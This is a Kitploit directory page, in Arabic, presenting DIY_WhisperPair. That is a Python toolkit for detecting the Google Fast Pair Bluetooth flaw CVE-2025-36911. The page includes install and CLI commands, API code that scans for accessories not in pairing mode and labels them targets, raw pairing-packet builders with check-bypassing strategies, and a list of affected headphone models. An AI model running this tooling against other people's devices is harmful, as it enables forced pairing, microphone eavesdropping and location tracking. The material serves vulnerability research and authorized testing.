Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
DIY_WhisperPair — اختراق ملحقات البلوتوث باستخدام Google Fast Pair: WhisperPair CVE-2025-36911 مرجع تنفيذ وأداة التحقق من الثغرات | Kitploit
أدوات/GitHubGitHub/spectrixdev/diy_whisperpair
أمن البلوتوثتحليل الثغرات الأمنيةالاستغلالأمن الشبكات اللاسلكيةاختبار الاختراقأمان الأجهزة وإنترنت الأشياءالأوراق والأبحاثالتعلم والتعليم
GitHubspectrixdev/diy_whisperpair

DIY_WhisperPair

اختراق ملحقات البلوتوث باستخدام Google Fast Pair: WhisperPair CVE-2025-36911 مرجع تنفيذ وأداة التحقق من الثغرات

عرض المستودع
10317منذ 2 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

DIY-WhisperPair

التنفيذ المرجعي لـ CVE-2025-36911 وأداة التحقق من الثغرات الأمنية

Research CVE Status

التنفيذ الرسمي متاح الآن، بفضل فريق KU Leuven (شكرًا للإشارة)

إشعار قانوني: هذه أداة لأبحاث الأمن السيبراني. اقرأ LEGAL.md قبل الاستخدام. الوصول غير المصرح به إلى أنظمة الكمبيوتر يُعد جريمة جنائية.


عرض توضيحي لـ WhisperPair

ما هي WhisperPair؟

اختطاف ملحقات البلوتوث باستخدام Google Fast Pair.

WhisperPair (CVE-2025-36911) هي ثغرة أمنية حرجة تسمح للمهاجمين بالاقتران القسري بملحقات الصوت الرائدة دون موافقة المستخدم، غالبًا في أقل من 10 ثوانٍ.

DIY-WhisperPair عبارة عن مجموعة أدوات بحثية تنفذ هذه الهجمات لإظهار ثلاثة مخاطر رئيسية:

  • اختطاف الجهاز: السيطرة على تدفقات الصوت والميكروفون من خلال تجاوز فحوصات وضع الاقتران.
  • تتبع الموقع: تسجيل الأجهزة بشكل خبيث في شبكة Google Find Hub لملاحقة الضحايا.
  • التأثير عبر الأنظمة البيئية: استغلال الملحقات بغض النظر عن الهاتف المقترن (iOS أو Android).

[!NOTE] للبحث فقط: تحتوي هذه المجموعة على ماسحات وأدوات تحقق كإثبات للمفهوم (Proof-of-Concept). وهي لا تتضمن أدوات للتنصت النشط أو التتبع المستمر للموقع أو حقن حمولات خبيثة. الغرض منها هو تحديد الأجهزة القابلة للاستغلال فقط.


البدء السريع

root@kitploit:~
# Install
git clone https://github.com/SpectrixDev/DIY_WhisperPair.git
cd DIY_WhisperPair
pip install -e .

# Run interactive CLI
whisperpair

يُطلق هذا الأمر قائمة تفاعلية:

root@kitploit:~
╦ ╦╦ ╦╦╔═╗╔═╗╔═╗╦═╗╔═╗╔═╗╦╦═╗
║║║╠═╣║╚═╗╠═╝║╣ ╠╦╝╠═╝╠═╣║╠╦╝
╚╩╝╩ ╩╩╚═╝╩  ╚═╝╩╚═╩  ╩ ╩╩╩╚═

────────────── Main Menu ──────────────

  1  Scan      Discover Fast Pair devices nearby
  2  Verify    Test device vulnerability (requires authorization)
  3  Info      Get detailed device information
  4  About     Learn about CVE-2025-36911
  0  Exit      Quit the application

Select option [1]:

للباحثين: Python API

هذه المكتبة مصممة لتكون سهلة التوسعة. استورد ما تحتاجه:

دوال بسيطة

root@kitploit:~
import asyncio
from whisperpair import scan_devices, verify_device, get_device_info

# Scan for Fast Pair devices
devices = asyncio.run(scan_devices(timeout=10))
for d in devices:
    print(f"{d.address} - {d.name} - Risk: {'HIGH' if not d.is_in_pairing_mode else 'Low'}")

# Find only vulnerable devices (not in pairing mode)
vulnerable = asyncio.run(scan_devices(vulnerable_only=True))

# Verify a specific device (REQUIRES AUTHORIZATION)
result = asyncio.run(verify_device("AA:BB:CC:DD:EE:FF"))
if result.success:
    print(f"VULNERABLE - Provider: {result.provider_address}")

# Get device info
info = asyncio.run(get_device_info("AA:BB:CC:DD:EE:FF"))
print(f"Model: {info['model_name']}")

بناء أدوات مخصصة

root@kitploit:~
from whisperpair import (
    # Scanner
    FastPairScanner,
    FastPairDevice,
    
    # Client  
    FastPairClient,
    VerificationResult,
    
    # Protocol
    KeyBasedPairingRequest,
    KeyBasedPairingResponse,
    PairingRequestFlags,
    parse_bluetooth_address,
    parse_kbp_response_multi_strategy,
    
    # Crypto
    FastPairCrypto,
    aes_128_encrypt,
    aes_128_decrypt,
    generate_account_key,
    
    # Constants
    FAST_PAIR_SERVICE_UUID,
    KEY_BASED_PAIRING_CHAR_UUID,
    KNOWN_MODEL_IDS,
)

# Custom scanner with callbacks
def on_found(device: FastPairDevice):
    if not device.is_in_pairing_mode:
        print(f"[!] Potential target: {device.address}")

scanner = FastPairScanner(timeout=15, on_device_found=on_found)
asyncio.run(scanner.scan())

# Build raw protocol packets (flags 0x11 = INITIATE_BONDING | EXTENDED_RESPONSE)
target_bytes = parse_bluetooth_address("AA:BB:CC:DD:EE:FF")
request = KeyBasedPairingRequest.for_verification(provider_address=target_bytes)
packet = request.build()  # 16-byte plaintext

# Multiple verification strategies available:
# - strategy_raw_kbp()      - flags 0x11, works on most vulnerable devices
# - strategy_with_seeker()  - flags 0x02, includes seeker address
# - strategy_retroactive()  - flags 0x0A, bypasses some checks
# - strategy_extended()     - flags 0x10, for newer devices

# Full custom flow (AES key optional - response detection alone indicates vulnerability)
async with FastPairClient("AA:BB:CC:DD:EE:FF") as client:
    model_id = await client.read_model_id()
    result = await client.verify_pairing_behavior()  # No key needed for detection
    if result.response_received:
        print("VULNERABLE - device responded when it shouldn't")

نصوص أمثلة

راجع examples.py للحصول على أمثلة جاهزة للنسخ واللصق:

root@kitploit:~
python examples.py scan              # Basic scanning
python examples.py vulnerable        # Find vulnerable devices
python examples.py verify AA:BB:CC:DD:EE:FF
python examples.py custom            # Scanner with callbacks

أوامر واجهة سطر الأوامر

الوضع التفاعلي (الافتراضي)

root@kitploit:~
whisperpair

الأوامر المباشرة

root@kitploit:~
# Scan for devices
whisperpair scan
whisperpair scan --vulnerable
whisperpair scan --timeout 15

# Get device info
whisperpair info AA:BB:CC:DD:EE:FF

# Verify vulnerability (requires flags)
whisperpair verify AA:BB:CC:DD:EE:FF --authorized

# Learn about the vulnerability
whisperpair about

المتطلبات القانونية

يجب أن يكون لديك إذن

تنفذ هذه الأداة عمليات Bluetooth نشطة. قبل تشغيل أي أوامر تحقق، يجب أن يكون لديك:

  1. إذن كتابي من مالك الجهاز، أو
  2. تملك الجهاز بنفسك

القوانين حسب الاختصاص القضائي

انظر LEGAL.md للحصول على إرشادات مفصلة.


الثغرة الأمنية (CVE-2025-36911)

الخلل

تتطلب Google Fast Pair من الأجهزة قبول طلبات الاقتران فقط عند تواجدها في وضع الاقتران. تفشل العديد من الأجهزة في هذا الفحص:

root@kitploit:~
EXPECTED: Device checks "Am I in pairing mode?" → NO → Reject
ACTUAL:   Device accepts request regardless of mode state

كيف يعمل الاكتشاف

يتم اكتشاف الثغرة عن طريق فحص ما إذا كان الجهاز يستجيب على الإطلاق لطلب اقتران قائم على المفتاح (Key-Based Pairing) عندما لا يكون في وضع الاقتران:

root@kitploit:~
graph TD
    subgraph Packet["Key-Based Pairing Request (16 bytes)"]
      direction LR
      B0["0x00"]
      B1["0x11"]
      MAC["MAC: 6 bytes"]
      Salt["Salt: 8 bytes"]
    end

    B0:::byte -- "Message Type" --> Desc0["Key-Based Pairing Request"]
    B1:::byte -- "Flags" --> Desc1["INITIATE_BONDING | EXTENDED_RESP"]

    classDef byte fill:#e1f5fe,stroke:#333,stroke-width:1px;

الاكتشاف: استلام استجابة = الجهاز قابل للاستغلال (لا حاجة لمفتاح AES!)

التأثير

يمكن للمهاجم داخل نطاق Bluetooth (~10-14 مترًا) أن:

  • يشغّل صوتًا عبر سماعات الضحية
  • يصل إلى الميكروفون للمراقبة
  • يتتبع الموقع عبر Google Find Hub

الأجهزة المتأثرة (قبل التصحيح)

الشركة المصنعةالأجهزة
Google

هيكل المشروع

root@kitploit:~
DIY_WhisperPair/
├── src/whisperpair/
│   ├── __init__.py      # Public API exports
│   ├── scanner.py       # BLE device discovery
│   ├── client.py        # GATT client & verification
│   ├── protocol.py      # Packet builders
│   ├── crypto.py        # AES-128, ECDH, keys
│   ├── constants.py     # UUIDs, Model IDs
│   └── cli.py           # Interactive CLI
├── examples.py          # Copy-paste code snippets
├── security_demo.py     # Standalone verification demo
├── LEGAL.md
└── README.md

التثبيت

root@kitploit:~
git clone https://github.com/SpectrixDev/DIY_WhisperPair.git
cd DIY_WhisperPair
python3 -m venv venv
source venv/bin/activate  # Linux/macOS
pip install -e .

المتطلبات

  • Python 3.10+
  • محول Bluetooth يدعم BLE
  • Linux: BlueZ 5.50+
  • Windows: Windows 10 1703+
  • macOS: macOS 10.13+

المراجع

البحث الأصلي

  • الموقع: whisperpair.eu
  • CVE: CVE-2025-36911
  • الورقة البحثية: "WhisperPair: اختطاف ملحقات البلوتوث باستخدام Google Fast Pair"
  • المؤلفون: KU Leuven DistriNet (Duttagupta, Antonijević, Preneel, Wyns, Singelée)

الوثائق التقنية

  • مواصفات Google Fast Pair
  • بروتوكول الاقتران القائم على المفتاح

فيديو

نقرة واحدة لاختطافهم جميعًا


الاستخدام المسؤول

تُقدَّم هذه الأداة حصريًا من أجل:

  • أبحاث الأمن السيبراني والتحقق من الثغرات
  • اختبار الاختراق المصرح به
  • التحقق من صحة أجهزة الشركات المصنعة
  • الأغراض التعليمية

ليست من أجل: الوصول غير المصرح به، أو المضايقة، أو المراقبة، أو أي نشاط غير قانوني.


الترخيص

رخصة MIT - انظر LICENSE


شكر وتقدير

  • SpectrixDev - مشرف المشروع
  • KU Leuven DistriNet - البحث الأصلي
  • Google Android Security Team - الإفصاح المنسق
  • Seytonic - فيديو شرح ممتاز
تنزيل الأداة
الاختصاص القضائيالقانون ذو الصلة
المملكة المتحدةقانون إساءة استخدام الحاسوب 1990، الأقسام 1-3A
الولايات المتحدةقانون الاحتيال وإساءة استخدام الحاسوب (CFAA)
الاتحاد الأوروبيالتوجيه 2013/40/EU
ألمانيا§ 202a-c من قانون العقوبات StGB
أسترالياقانون العقوبات لعام 1995، الجزء 10.7
Pixel Buds Pro 2
SonyWF-1000XM4, WH-1000XM5, LinkBuds S
JBLTune Buds, Live Pro 2
AnkerSoundcore Liberty 4
أخرىانظر whisperpair.eu